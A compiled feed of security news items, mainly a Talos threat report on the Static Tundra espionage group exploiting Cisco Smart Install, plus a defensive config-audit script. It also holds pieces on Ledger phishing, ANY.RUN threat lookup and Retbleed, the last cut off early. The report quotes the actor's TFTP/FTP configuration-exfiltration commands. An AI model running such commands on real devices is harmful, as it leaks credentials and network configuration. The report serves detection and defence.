“What happens online stays online” and other cyberbullying myths, debunked

Separating truth from fiction is the first step towards making better parenting decisions. Let’s puncture some of the most common misconceptions about online harassment.

Source: WeLiveSecurity

Cherry pie, Douglas firs and the last trip of the summer

(Welcome to this week’s edition of the Threat Source newsletter.) 

Diane, 

2:01 p.m., August 21st. I’ve just returned from a remarkable journey through Seattle and the misty roads of the Olympic Peninsula. If you ever find yourself driving beneath those towering Douglas firs or dragged by your partner through the Twilight Museum in Forks, I recommend stopping for a cup of hot, black coffee and a slice of cherry pie at any roadside diner. It’s nothing short of extraordinary.  

But as I navigated the Rialto Beach tidepools (at 5:30 a.m., no less) and moss-laden trees of the Hoh Rainforest, I made a classic misstep: I forgot to connect to Wi-Fi the entire trip. By the time I returned, my high-speed data allowance had vanished into the mist, leaving me puzzled and restarting my cell phone for days — a humbling reminder that even seasoned agents can overlook the basics. 

Travel is a curious thing, Diane. When you’re on the road, it’s easy to let your guard down, become enchanted by the scenery and forget that digital dangers can lurk behind every public WiFi signal or seemingly harmless USB charging station. 

As the summer draws to a close and more people venture out of Twin Peaks for those last-minute adventures, I’ve compiled a list of field-tested precautions for the journey ahead, because even professionals need a reminder sometimes: 

  1. Update your devices and back up important data before you leave. If a device is lost, stolen or infected with malware, you’ll still have access to your files. 
  2. Turn off auto-connect features to reduce the risk of connecting to rogue networks or devices. 
  3. Only take what you need. The fewer devices you take, the fewer you have to keep track of and worry about. 
  4. Limit the use of location services on your devices and apps unless necessary. This protects your privacy and reduces the risk of targeted attacks while traveling. 
  5. Steer clear of public computers in hotel lobbies and libraries, especially for accessing sensitive accounts. If you must use them — or if you log in to any streaming services during your stay — don’t forget to log out of your accounts. 
  6. Public WiFi is convenient, but we know its security can be questionable. Use a VPN or your phone’s hotspot for a more secure connection. 
  7. Set up device tracking (like Find My iPhone or Find My Device) and know how to remotely wipe your device in case it’s lost or stolen. 
  8. Take a power bank with you to avoid using USB charging stations, which could result in malware being downloaded to your device. 

Diane, the woods are lovely, dark and deep, and so are the digital trails we leave behind. Stay vigilant, stay caffeinated and remember that the best protection is awareness. 

Special Agent Dale Cooper

The one big thing 

Static Tundra, a Russian state-backed group, is exploiting end-of-life and unpatched Cisco network devices using a seven-year-old patched vulnerability (CVE-2018-0171) to steal data and maintain long-term hidden access in organizations worldwide. Their tactics include persistent implants and bespoke SNMP tools to exfiltrate data and maintain undetected access, with a focus on entities of strategic interest to the Russian government. We urge immediate patching or disabling of at-risk features to prevent compromise. 

Why do I care? 

If your organization uses Cisco devices that haven’t been patched or replaced, you could be vulnerable to undetected cyberattacks and data breaches—even if the vulnerability is years old. This risk affects organizations of all sizes and industries, putting sensitive data and business operations in jeopardy. 

So now what? 

Immediately review your network infrastructure for unpatched or end-of-life Cisco devices and apply available patches or disable vulnerable features as recommended. Ongoing security hardening, regular updates and vigilant monitoring are critical to defend against this and similar state-sponsored threats.

Top security headlines of the week 

Workday Data Breach Bears Signs of Widespread Salesforce Hack 
Workday said threat actors gained access to a third-party customer relationship management (CRM) system and obtained “commonly available business contact information” such as names, phone numbers, and email addresses. (SecurityWeek)

Novel 5G Attack Bypasses Need for Malicious Base Station 
A team of researchers from the Singapore University of Technology and Design released a framework named Sni5Gect that can be used to sniff messages and perform message injection in 5G communications. (SecurityWeek)

Internet-wide Vulnerability Enables Giant DDoS Attacks 
Researchers from Tel Aviv University have identified a way around the Rapid Reset fix called “MadeYouReset,” and it’s raising the possibility that attackers could enact cyberattacks against up to one-third of all websites globally. (Dark Reading)

Threat Actors Allegedly Listed Windows Zero-Day RCE Exploit For Sale on Dark Web 
The threat actor claims it targets fully updated Windows 10, Windows 11, and Windows Server 2022 systems. The sale conditions emphasize exclusivity, prohibiting resale unless explicitly negotiated, which is typical for premium exploits. (Cybersecurity News)

XenoRAT malware campaign hits multiple embassies in South Korea  
The targets were generally European embassies in Seoul and the themes included fake meeting invites, official letters, and event invitations, often sent from impersonated diplomats. (BleepingComputer)

Can’t get enough Talos? 

The art of controlling information 
JJ Cummings leads Talos’ Threat Intelligence and Interdiction team on nation-state security and intelligence. He shares his story, thoughts on burnout and motivation, and advice for anyone looking to join Talos.

Ransomware incidents in Japan during the first half of 2025 
In the first half of 2025, the number of ransomware attacks in Japan increased by approximately 1.4 times compared to the previous year. Read our blog to learn the most recent trends.

Cyber Analyst Series: Cybersecurity overview and the role of the cybersecurity analyst 
A series of videos on the profession of cybersecurity analysts made in conjunction with the Ministry of Digital Transformation of Ukraine for Diia.Education (available in English and Ukrainian languages).

Upcoming events where you can find Talos 

  • BlueTeamCon (Sept. 4 – 7) Chicago, IL 
  • LABScon (Sept. 17 – 20) Scottsdale, AZ 
  • VB2025 (Sept. 24 – 26) Berlin, Germany 

Most prevalent malware files from Talos telemetry over the past week


Source: Cisco Talos Blog

A phishing scam targeting Ledger users | Kaspersky official blog

Until recently, scammers have mainly focused on targeting cryptocurrency wallets owned by individual users. However, it appears that businesses are increasingly using cryptocurrencies, so attackers are now trying to get their hands on corporate wallets as well. You don’t have to look far for examples. The recently studied Efimer malware, which was distributed to organizations, is capable of swapping cryptocurrency wallet addresses in the clipboard. So we weren’t really surprised to observe cryptocurrency phishing campaigns directed at both individual and corporate users. What did come as a surprise, though, was the sophistication of the cover story and of the scam as a whole.

The phishing scheme

This particular scheme targets users of Ledger hardware cryptocurrency wallets — specifically the Nano X and Nano S Plus. The scammers send out a phishing email with a lengthy apology. The email claims that, due to a technical flaw, segments of the users’ private keys were transmitted to a Ledger server; the data was well-protected and encrypted, but the “company’s team” had discovered a highly complex data breach. The attackers’ fake story goes on to state that they’d exfiltrated fragments of keys, and then used extremely advanced methods to decrypt and reconstruct some of them — “leading to the theft of crypto assets”. Users are then advised to prevent their crypto wallets from being compromised through the same vulnerability, with the attackers recommending immediately updating the firmware of their device.

Phishing prompt to update the firmware

It’s a compelling story, to be sure. But if you apply some critical thinking, a few inconsistencies crop up. For example, it’s unclear how a fragment of a key could be used to reconstruct the whole thing. It’s also completely baffling what these “advanced decryption methods” are, and how Ledger representatives supposedly know about them.

The email itself is crafted extremely carefully: there’s almost nothing to nitpick. It wasn’t even sent with the help of standard scammer tools; instead, the attackers used a legitimate mailing service, SendGrid. This means the emails have a good reputation and often bypass anti-phishing filters. The only red flags are the sender’s domain and the domain of the website users are told to visit for the firmware update. Needless to say, neither has any connection to Ledger.

The scammers’ website

The website is also very clean and professionally designed — if you ignore the completely irrelevant domain it’s hosted on, that is. It’s possible the site serves multiple scams, as there’s no mention of a firmware update, and it lists far more devices than the email does. The website even has a functional support chat! While that’s most likely a chatbot, it does respond to questions and gives seemingly helpful advice. The whole point of the site is to get you to enter your seed phrase after you select your device.

The interface for entering seed phrases

A seed phrase is a randomly generated sequence of words used for recovering access to a cryptocurrency wallet. And as you may have guessed, it should not be entered, as anyone who knows it can gain full access to your crypto assets.

On a separate note, when you search for similar sites on Google, you’ll find a surprising number of similar fake pages. This type of scam is clearly quite popular.

How to stay out of harm’s way?

Whether you manage your crypto assets on your own devices or simply use regular online banking apps, it’s crucial to stay informed about the latest tactics attackers are using. For company employees, we recommend specialized training tools to boost their awareness of modern cyberthreats. One effective way to do this is by using the Kaspersky Automated Security Awareness Platform. For home users, our blog is a great resource for learning how to spot phishing scams.

Additionally, we recommend installing a robust security solution on both the personal and work devices you use for financial transactions. These solutions can both block access to phishing sites and prevent data breaches.

Source: Kaspersky official blog

Russian state-sponsored espionage group Static Tundra compromises unpatched end-of-life network devices

  • Static Tundra is a Russian state-sponsored cyber espionage group linked to the FSB’s Center 16 unit that has been operating for over a decade, specializing in compromising network devices for long-term intelligence gathering operations.
  • The group actively exploits a seven-year-old vulnerability (CVE-2018-0171) in the Smart Install feature of Cisco IOS software, which was patched when the vulnerability was published, targeting unpatched and end-of-life network devices to steal configuration data and establish persistent access.
  • Primary targets include organizations in telecommunications, higher education and manufacturing sectors across North America, Asia, Africa and Europe, with victims selected based on their strategic interest to the Russian government.
  • Static Tundra employs sophisticated persistence techniques including the historic SYNful Knock firmware implant (first reported in 2015) and bespoke SNMP tooling to maintain undetected access for multiple years.
  • The threat extends beyond Russia’s operations — other state-sponsored actors are likely conducting similar network device compromise campaigns, making comprehensive patching and security hardening critical for all organizations.
  • Threat actors will continue to abuse devices which remain unpatched and have Smart Install enabled.
  • Customers are urged to apply the patch for CVE-2018-0171 or to disable Smart Install as indicated in the advisory if patching is not an option. Customer support is available if needed by initiating a TAC request.

Since 2015, Cisco Talos has observed the compromise of unpatched and often end-of-life Cisco networking devices by a highly sophisticated threat actor. Based on sufficient recent activity observed through our ongoing analysis, we have designated this threat cluster “Static Tundra.” This blog highlights our observations regarding this threat actor and provides recommendations for detecting and preventing activities associated with Static Tundra.

Threat actor and campaign overview

Talos assesses with high confidence that Static Tundra is a Russian state-sponsored cyber espionage group specializing in network device exploitation to support long-term intrusion campaigns into organizations that are of strategic interest to the Russian government. Static Tundra is likely a sub-cluster of another group, “Energetic Bear” (aka BERSERK BEAR), based on an overlap in tactics, techniques and procedures (TTPs) and victimology, which has been corroborated by the FBI. Energetic Bear was linked to the Russian Federal Security Service’s (FSB) Center 16 unit in a 2022 U.S. Department of Justice indictment. Talos also assesses with moderate confidence that Static Tundra is associated with the historic use of “SYNful Knock,” a malicious implant installed on compromised Cisco devices publicly reported in 2015.

Static Tundra is assessed to be a highly sophisticated cyber threat actor that has operated for over a decade, conducting long-term espionage operations. Static Tundra specializes in network intrusions, demonstrated by the group’s advanced knowledge of network devices and use of bespoke tooling, possibly including the novel, but now decade-old, SYNful Knock router implant.

Static Tundra targets unpatched, and often end-of-life, network devices to establish access on primary targets and support secondary operations against related targets of interest. Once they establish initial access to a network device, Static Tundra will pivot further into the target environment, compromising additional network devices and establishing channels for long-term persistence and information gathering. This is demonstrated by the group’s ability to maintain access in target environments for multiple years without being detected.

For years, Static Tundra has been compromising Cisco devices by exploiting a previously disclosed vulnerability in the Smart Install feature of Cisco IOS software and Cisco IOS XE software (CVE-2018-0171) that has been left unpatched, often after those devices are end-of-life. We assess that the purpose of this campaign is to compromise and extract device configuration information en masse, which can later be leveraged as needed based on then-current strategic goals and interests of the Russian government. This is demonstrated by Static Tundra’s adaptation and shifts in operational focus as Russia’s priorities have changed over time.

Since Static Tundra was first observed in 2015, the group has targeted organizations in the telecommunications, higher education and manufacturing sectors. Victims are primarily based in Ukraine and allied countries, but also include other entities globally. Talos estimates Static Tundra will continue network intrusion campaigns into organizations that are of strategic interest to Russia, specifically manufacturing and higher education, and targets of political interest will likely continue to include Ukraine and its allies.

While this blog focuses on Static Tundra’s ongoing campaign against network devices, many other state-sponsored actors also covet the access these devices afford, as we have warned many times over the years. Organizations should be aware that other advanced persistent threats (APTs) are likely prioritizing carrying out similar operations as well.

Targeting and victimology

Static Tundra has been observed as primarily targeting organizations in the telecommunications, higher education and manufacturing sectors, pivoting over time in alignment with shifts in Russian strategic interests. Known victims span multiple geographic regions, including North America, Asia, Africa and Europe.

One of the clearer targeting shifts we observed was that Static Tundra’s operations against entities in Ukraine escalated at the start of the Russia-Ukraine war, and have remained high since then. Static Tundra was observed compromising Ukrainian organizations in multiple verticals, as opposed to previously more limited, selective compromises typically being associated with this threat actor.

Tactics, techniques and procedures (TTPs)

We assess that Static Tundra’s two primary operational objectives are 1) compromising network devices to gather sensitive device configuration information that can be leveraged to support future operations, and 2) establishing persistent access to network environments to support long-term espionage in alignment with Russian strategic interests. Because of the large global presence of Cisco network infrastructure and the potential access it affords, the group focuses heavily on the exploitation of these devices and possibly also the development of tools to interact with and persist on these devices. Static Tundra utilizes bespoke tooling that prioritizes persistence and stealth to achieve these objectives. The tooling and techniques target old and unpatched edge devices.

Initial access

Since at least 2021, Static Tundra has been observed aggressively exploiting CVE-2018-0171, a known and patched vulnerability in Cisco IOS software and Cisco IOS XE software that could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device.

Cisco issued a patch for CVE-2018-0171 in 2018. As advised previously by Cisco, customers are strongly urged to apply the patch immediately given active and ongoing exploitation of the vulnerability by sophisticated state-sponsored or state-aligned advanced persistent threat (APT) groups. Devices that are beyond end of life and cannot support the patch require additional security precautions as detailed in the 2018 security advisory. Unpatched devices with Smart Install enabled will continue to be vulnerable to these and other attacks unless and until customers take action.

Talos assesses with moderate confidence that Static Tundra leverages bespoke tooling to automate the exploitation of CVE-2018-0171 and subsequent configuration exfiltration against a predefined set of target IP addresses, likely gathered using publicly available scan data from a service such as Shodan or Censys. The process is similar to those that have been reported publicly in red teaming blogs and similar publications.

After gaining initial entry via exploitation of the Smart Install vulnerability, Static Tundra’s CVE-2018-0171 attack chain continues by issuing a command that will modify the running configuration and enable the local Trivial File Transfer Protocol (TFTP) server:

tftp-server nvram:startup-config

This then allows Static Tundra to make a follow-up connection to the newly spawned TFTP server to retrieve the startup configuration. The extracted configuration may reveal credentials and/or Simple Network Management Protocol (SNMP) community strings that can then be leveraged for more direct access to the system.

Static Tundra has also been observed making initial access to devices via SNMP, leveraging a community string that was either compromised in a previous attack or guessed. In some cases, the group used insecure community strings of “anonymous” and “public” with read-write permissions.

Execution

Upon gaining initial access to a target environment, Static Tundra interacts with the SNMP service using community strings that were compromised during the initial access phase. In some cases, Static Tundra spoofs the source address of the SNMP traffic. This technique allows the threat actor to obfuscate their infrastructure and bypass access control lists (ACLs), as the SNMP protocol does not use session establishment. SNMP offers a variety of options for further execution on a compromised device, such as executing commands directly, modifying the running configuration and extracting the current running configuration or startup configuration.

Static Tundra leverages SNMP to send instructions to download a text file from a remote server and append it to the running configuration. This can allow for additional means of access via newly created local user accounts in conjunction with enabling remote services including TELNET.

Persistence

Due to the relatively static nature of network environments, Static Tundra often relies on compromised SNMP community strings and credentials to maintain access to systems over the course of multiple years. In some cases, Static Tundra creates privileged local user accounts and/or additional SNMP community read-write strings.

Static Tundra has been observed leveraging a Cisco IOS firmware implant known as SYNful Knock to achieve persistent access to compromised systems. SYNful Knock is a modular implant that attackers inject into a Cisco IOS image and then load onto the compromised device. This provides a stealthy means of access that will persist through reboots. Remote access to the device can then be achieved by sending a specifically crafted TCP SYN packet, commonly referred to as a “magic packet.” Additional information, including a full technical write-up, can be found in a 2015 blog published by Mandiant with additional details from a 2015 Cisco blog. Additionally, Talos has published a script that can be used to scan for and detect the SYNful Knock implant.

Defense evasion

Static Tundra has been observed modifying TACACS+ configuration on compromised devices, hindering remote logging capabilities. Static Tundra also modifies access control lists (ACLs) to permit access from specific IP addresses or ranges under their control.

Discovery

Static Tundra likely uses publicly-available scan data from services such as Shodan or Censys to identify systems of interest. Once inside a target environment, Static Tundra relies heavily on native commands, such as “show cdp neighbors”, to reveal additional systems of interest within the target environment. This presents a relatively stealthy way to identify further targets without the need for active scanning.

Collection

One of Static Tundra’s primary actions on objectives is to capture network traffic that would be of value from an intelligence perspective. To achieve this, Static Tundra establishes Generic Routing Encapsulation (GRE) tunnels that redirect traffic of interest to attacker-controlled infrastructure, which can then be captured and further analyzed. Static Tundra has also been observed collecting and exfiltrating NetFlow data on compromised systems, revealing source and destination information on streams of potential interest.

Exfiltration

Static Tundra exfiltrates configuration information through a variety of means, including inbound TFTP connections via the Smart Install exploitation procedure mentioned in the Initial Access section, outbound TFTP or FTP connections from the compromised device to attacker-controlled infrastructure, and inbound SNMP connections using the copy configuration process.

Static Tundra leverages bespoke SNMP tooling and functionality provided by the CISCO-CONFIG-COPY-MIB to exfiltrate configurations from compromised devices via either TFTP or Remote Copy Protocol (RCP).

Static Tundra has been observed using the following commands to exfiltrate configuration files via TFTP and FTP:

do show running-config | redirect tftp://:/conf_bckp
copy running-config ftp://user:pass@/output.txt

Detection

Talos recommends taking the following steps to identify suspicious activity that may be related to this campaign:

  • Conduct comprehensive configuration management (including auditing), in line with best practices.
  • Conduct comprehensive authentication, authorization and command issuance monitoring.
  • Monitor syslog and AAA logs for unusual activity, including a decrease in normal logging events, or a gap in logged activity.
  • Monitor your environment for unusual changes in behavior or configuration.
  • Profile (fingerprint via NetFlow and port scanning) network devices for a shift in surface view, including new ports opening/closing and traffic to/from (not traversing).
  • Where possible, develop NetFlow visibility to identify unusual volumetric changes.
  • Look for non-empty or unusually large .bash_history files.

Additional identification and detection can be performed using the Cisco forensic guides.

Preventative measures

The following strong recommendations apply to entities in all sectors.

  • Cisco-specific measures
    • Apply the patch for CVE-2018-0171.
    • Disable Smart Install as indicated in the advisory if patching is not an option.
    • Leverage Cisco Hardening Guides when configuring devices.
    • Disable telnet and ensure it is not available on any of the Virtual Teletype (VTY) lines on Cisco devices by configuring all VTY stanzas with “transport input ssh” and “transport output none”.
    • Disable Cisco’s Smart Install service using “no vstack” for any device where application of the available patch for CVE-2018-0171 is infeasible, and develop end-of-life management plans for technology too old to patch.
    • Utilize Type 8 passwords for local account credential configuration.
    • Utilize Type 6 for TACACS+ key configuration.
  • General measures
    • Rigorously adhere to security best practices, including updating, access controls, user education and network segmentation.
    • Stay up to date on security advisories from the U.S. government and industry and consider suggested configuration changes to mitigate described issues.
    • Update devices as aggressively as possible. This includes patching current hardware and software against known vulnerabilities and replacing end-of-life hardware and software.
    • Select complex passwords and community strings and avoid default credentials.
    • Use multi-factor authentication (MFA).
    • Encrypt all monitoring and configuration traffic (e.g., SNMPv3, HTTPS, SSH, NETCONF, RESTCONF).
    • Lock down and aggressively monitor credential systems, such as TACACS+ and any jump hosts.
    • Utilize AAA to deny configuration modifications of key device protections (e.g., local accounts, TACACS+, RADIUS).
    • Prevent and monitor for exposure of administrative or unusual interfaces (e.g., SNMP, SSH, HTTP, HTTPS).
    • Disable all non-encrypted web management capabilities.
    • Verify existence and correctness of access control lists for all management protocols (e.g., SNMP, SSH, Netconf, etc.).
    • Store configurations centrally and push to devices. Do NOT allow devices to be the trusted source of truth for their configurations.
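As a defender-side companion to the Detection and Preventative measures sections above, the following is an added example (not Talos tooling, and not code from the original post) that audits a Cisco IOS running-config for the conditions those sections describe: Smart Install not explicitly disabled, a tftp-server line serving the device’s own config, default or unrestricted SNMP communities, local credentials not stored as Type 8, a TACACS+ key not stored as Type 6, GRE tunnel interfaces, and VTY lines not limited to “transport input ssh” / “transport output none”. Both configs are constructed; the hashes, keys and 192.0.2.0/24 addresses are placeholders, and the regexes cover only the common IOS syntax forms.

```python
"""Audit a Cisco IOS / IOS XE running-config for the weak settings and on-box artifacts
the Static Tundra write-up describes. Added example, not Talos tooling: both configs are
constructed (192.0.2.0/24 is a documentation range) and every hash or key is a placeholder."""
import re
from dataclasses import dataclass
from typing import List

# Constructed "before" config exhibiting several conditions from the write-up.
WEAK_CONFIG = """\
logging host 192.0.2.50
username admin privilege 15 secret 8 $8$constructed$placeholder
username backup privilege 15 password 7 0822455D0A16
tacacs server ISE
 key 7 094F471A1A0A
snmp-server community public RW
snmp-server community m0n1t0r RO 10
tftp-server nvram:startup-config
interface Tunnel100
 tunnel destination 192.0.2.99
line vty 0 4
 transport input telnet ssh
 transport output none
line vty 5 15
 transport input ssh
end
"""

# Constructed "after" config applying the page's Cisco-specific measures.
HARDENED_CONFIG = """\
logging host 192.0.2.50
no vstack
username admin privilege 15 secret 8 $8$constructed$placeholder
tacacs server ISE
 key 6 constructedType6Key
snmp-server community m0n1t0r RO 10
line vty 0 15
 transport input ssh
 transport output none
end
"""

WEAK_COMMUNITIES = {"public", "private", "anonymous"}  # "public" and "anonymous" were seen in the campaign

@dataclass(frozen=True)
class Finding:
    severity: str  # "high" or "medium"
    check: str     # short identifier of the failed check
    detail: str    # offending line or explanation

def _stanzas(lines):
    """Group config lines into (top-level line, indented child lines) pairs."""
    header, kids = None, []
    for line in lines:
        if line.startswith(" ") and header is not None:
            kids.append(line.strip())
            continue
        if header is not None:
            yield header, kids
        header, kids = line.strip(), []
    if header is not None:
        yield header, kids

def audit_config(config: str) -> List[Finding]:
    lines = [l for l in config.splitlines() if l.strip() and l.strip() != "!"]
    flat = [l.strip() for l in lines]
    out: List[Finding] = []
    if "no vstack" not in flat:  # Smart Install (CVE-2018-0171 surface); IOS shows "no vstack" only once disabled
        out.append(Finding("high", "smart-install", "no 'no vstack' line; Smart Install may be enabled"))
    if not any(l.startswith("logging host") for l in flat):  # the actor tampers with remote logging
        out.append(Finding("medium", "no-remote-logging", "no 'logging host' configured"))
    for l in flat:
        if l.startswith("tftp-server ") and "config" in l:  # device serving its own config over TFTP
            out.append(Finding("high", "tftp-server", l))
        m = re.match(r"snmp-server community (\S+)(?: (RO|RW))?(?: (\S+))?$", l, re.I)  # name, mode, ACL
        if m:
            name, mode, acl = m.group(1), (m.group(2) or "RO").upper(), m.group(3)
            if name.lower() in WEAK_COMMUNITIES:
                out.append(Finding("high", "snmp-weak-community", l))
            if mode == "RW" and acl is None:
                out.append(Finding("high", "snmp-rw-no-acl", l))
        m = re.match(r"username \S+ .*?(?:secret|password) (?:(\d) )?\S+$", l)  # want Type 8; 7 is reversible
        if m and m.group(1) != "8":
            out.append(Finding("medium", "weak-password-type", l))
    for header, kids in _stanzas(lines):
        if header.startswith("tacacs"):  # TACACS+ key should be stored as Type 6
            for k in [header] + kids:
                m = re.match(r"(?:tacacs-server )?key(?: (\d))? \S+$", k)
                if m and m.group(1) != "6":
                    out.append(Finding("medium", "tacacs-key-type", k))
        elif header.startswith("interface Tunnel"):  # GRE is the default mode, so the line is often absent
            mode = next((k[12:] for k in kids if k.startswith("tunnel mode ")), "gre ip")
            dest = next((k.split()[-1] for k in kids if k.startswith("tunnel destination ")), "?")
            if mode.startswith("gre"):
                out.append(Finding("medium", "gre-tunnel", f"{header} -> {dest}"))
        elif header.startswith("line vty"):  # exactly 'transport input ssh' plus 'transport output none'
            if [k for k in kids if k.startswith("transport input")] != ["transport input ssh"]:
                out.append(Finding("high", "vty-transport-input", header))
            if "transport output none" not in kids:
                out.append(Finding("medium", "vty-transport-output", header))
    return out
```

Run audit_config over a saved “show running-config” export; any finding in the weak sample corresponds to a measure in the list above, and the hardened sample produces none.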

Indicators of compromise (IOCs)

Indicator          Type        Known Activity
185.141.24[.]222   IP Address  2023/03/23
185.82.202[.]34    IP Address  2025/01/15 – 2025/02/28
185.141.24[.]28    IP Address  2024/10/01 – 2025/07/03
185.82.200[.]181   IP Address  2024/10/01 – 2024/11/15

Source: Cisco Talos Blog

How to Enrich IOCs with Actionable Threat Context: Tips for SOC Analysts 

One solution can change everything. ANY.RUN’s Threat Intelligence Lookup is living proof of that. 

By delivering a browsable source of threat data, it helps your SOC overcome challenges that have to be faced in order to reach higher detection rates and make smarter security decisions. 

Find details on how to make the most of TI Lookup below. 

Threat Intelligence Lookup: Context for Fatigue-Free Investigations 

Main page of TI Lookup with statistics and MITRE ATT&CK Matrix 

ANY.RUN develops essential solutions for SOCs, such as Threat Intelligence Lookup—a searchable database of threat data. Its goal is to bridge the threat intelligence gap for malware analysts by enriching indicators with actionable context. 

TI Lookup makes it possible by providing swift access to data collected from millions of malware analyses done in ANY.RUN sandbox by experts who work for 15,000 companies all over the world. This lets you add context to your indicators and tap into this fresh, actionable data on attacks that just happened. The best part is—it’s available at no cost. 

The free version of TI Lookup gives you access to the 20 most recent sandbox analyses per query, unlocks key search fields (file hashes, URLs, domains, IPs, MITRE ATT&CK techniques, Suricata IDs, etc.), and makes it possible to create compound searches. 

For free, you can achieve: 

  • Enriched Threat Investigations: Gain deeper insight into threats by connecting existing artifacts with real-world attacks. 
  • Accelerated Response: Reduce MTTR by quickly understanding threat behavior, objectives, and targets through sandbox analysis. 
  • Stronger Proactive Defense: Gather intelligence on emerging threats to act before they cause damage. 
  • Enhanced Team Expertise: Empower SOC analysts to study real-world attacks and adversary TTPs in live malware using the interactive MITRE ATT&CK matrix. 
  • Improved Detection Rules: Leverage intelligence from TI Lookup to refine SIEM, IDS/IPS, and EDR rules for stronger proactive defense. 

Use Cases of TI Lookup’s Free Version 

Register in TI Lookup for free, and you’ll be able to access actionable threat insights right away. Apply them in scenarios like these: 

Enriching Network Indicators with Context 

A practical example: you need to check a domain to see if it is tied to any malicious activity and, if so, gather more information about it.  

Enter it into TI Lookup and you’ll instantly see the result. The following domain, for instance, turned out to be malicious: 

domainName:"technologyenterdo.shop" 

TI Lookup’s conclusion on the query 

With a free plan, you can access up to 20 recent analysis sessions that involve it to enrich the indicator with reliable context. In addition to domains, the same can be done for IPs and URLs, also for free. 

TI Lookup’s Premium plan lets you see even more information. For example, the domain above is labeled with a “malconf” tag. This means that it was retrieved from the very heart of a malicious sample—the malware configuration—by ANY.RUN’s experts. Indicators from configs offer trustworthy, valuable insights into the malware’s behavior and impact. 

Premium plan gives you more details, such as info on domains 

Exploring New Threat Samples 

Since around 73% of attacks start with phishing, SOC teams should stay on the lookout for fresh threat samples that can potentially harm your company. One thing you can do is to monitor current TTPs in TI Lookup. 

To narrow down your search, you can keep track of threats submitted by analysts from your country. For example, the following query will help you browse Tycoon threats detected in Germany: 

threatName:"tycoon" AND submissionCountry:"de" 

Search results for Tycoon threats submitted in Germany 

From there, you can collect indicators from search results and create or update your detection rules in order to stay ahead of potential threats. 

TI Lookup shares links to relevant ANY.RUN sandbox sessions like this one 

Checking File Hashes 

Another essential use case of TI Lookup is performing a quick check for an indicator. Let’s see if this hash is connected to any threats: 

sha256:"a78cdb5cf41aa777d9fb082e094f7a8b9e73d0b31d8358db3a58a5ba8ae42ca5"  

The verdict: it’s associated with Lumma. One simple query, and you’ve received a trustworthy result based on actual threat investigations by other analysts. 

Results of looking up hash from query above 

Tracking Threats by TTPs 

ANY.RUN also provides access to the interactive MITRE ATT&CK matrix that shows you real-world examples of threats active today. With it, you can learn about different TTPs recently used by threat actors and see how they look in action via ANY.RUN’s Interactive Sandbox. 

For that, go to TI Lookup and click any TTP to dig deeper. For example, here are some of the results for T1068: Exploitation for Privilege Escalation: 

Access further info on Tactics, Techniques, and Procedures 

You see the description for this TTP and links to malicious samples that involve it. Click any analysis session to see the full detonation and retrieve indicators. 

Transforming Your SOC for Proactive Security 

TI Lookup’s free version gives you more than just a glimpse into threat intelligence. As we’ve shown above, it can be a powerful solution to a number of SOC challenges. 

The Premium plan, however, gives you even more. It’s an enterprise-grade product that helps businesses whatever their infrastructure looks like: 

  • Speed Up and Automate Detection: Correlate alerts against a vast database of IOCs, IOBs, and IOAs, and integrate TI Lookup with your SIEM, TIP, or SOAR systems for real-time monitoring.
  • Hunt and Investigate with Depth and Precision: Create and search custom YARA rules in ANY.RUN’s database and refine investigations with 40+ parameters and advanced operators. 
  • Stay Proactive and Informed: Set automated alerts for specific IOCs or patterns, and leverage TI Reports from expert analysts to track evolving malware trends across industries. 

Among Premium features are Query Updates. They automate the process of indicator enrichment by keeping you subscribed to threats and indicators of interest. Enter any query, such as: 

threatName:"remcos" AND domainName:"" 

Results of the query in TI Lookup Premium 

Click the bell icon, and you’ll start receiving fresh data on new samples that fit your query. As you can see, there are plenty: 

Subscribe to the query using the button in the top right corner to stay ahead 

Another way to deepen your investigation is to browse Indicators of Behavior (IOBs). This allows you to research attacks using minor artefacts like a suspicious fragment of a command line. Type it in like so: 

commandLine:"$codigo"   

As a result, you’ll find out that this command line is actually related to AsyncRAT’s steganography attacks.

TI Lookup returns over 400 analyses of malicious samples associated with this command line  

About ANY.RUN 

Trusted by more than 500,000 security professionals and 15,000+ organizations across industries like finance, healthcare, and manufacturing, ANY.RUN empowers teams to investigate malware and phishing threats with speed and accuracy. 

With ANY.RUN’s Interactive Sandbox, you can safely analyze suspicious files and URLs, observe live behavior, and extract key insights to dramatically reduce triage and decision-making time. 

Tap into Threat Intelligence Lookup and TI Feeds to uncover IOCs, attacker tactics, and behavioral patterns linked to real-world threats for staying one step ahead of evolving attacks. 

Experience ANY.RUN’s solutions firsthand to enhance your SOC workflow via a trial period 

The post How to Enrich IOCs with Actionable Threat Context: Tips for SOC Analysts  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

Retbleed exploitation in realistic setting | Kaspersky official blog

In a new paper, Google researchers Matteo Rizzo and Andy Nguyen have detailed an improved Retbleed attack scenario. As we’ve explained in a previous post, the original Retbleed attack exploited vulnerabilities in AMD’s Zen and Zen 2, as well as Intel’s Kaby Lake and Coffee Lake CPUs. Hardware vulnerabilities of this kind are extremely difficult to exploit in realistic settings, which is why the various forms of Spectre and derivative attacks like Retbleed have remained largely theoretical. Despite this, both CPU manufacturers and software developers have implemented methods to mitigate them. The essence of the new Google research is to demonstrate how the effectiveness of the Retbleed attack can be increased. Without fundamentally changing the attack’s architecture, they were able to leverage features of AMD Zen 2 CPUs to read arbitrary data from RAM.

Retbleed in a nutshell

Like Spectre, Retbleed exploits a feature called branch prediction in a computer’s CPU. Branch prediction allows the processor to speculatively execute instructions without waiting for the results of previous computations. Sometimes such predictions are wrong, but normally this only results in a slight, imperceptible slowdown in the application’s performance.

In 2018, the Spectre attack showed that incorrect predictions can be used to steal secrets. This is possible due to two key characteristics. First, the branch prediction system can be trained to access a memory area containing secret data, which then gets loaded into the CPU cache. Second, a way was found to extract this secret data from the cache through a side channel by measuring the execution time of a specific instruction.

Retbleed can be considered an evolution of the Spectre v2 attack: it also exploits the characteristics of the branch prediction system, but differs in how it injects instructions. What’s more, Retbleed can bypass the technology used to protect against Spectre v2, and therefore threatens systems running on more modern hardware. Retbleed remains difficult to implement. A demonstration in ideal conditions by the authors of the original research took a full 90 minutes to extract the secret (in that case a user password).

What the Google researchers accomplished

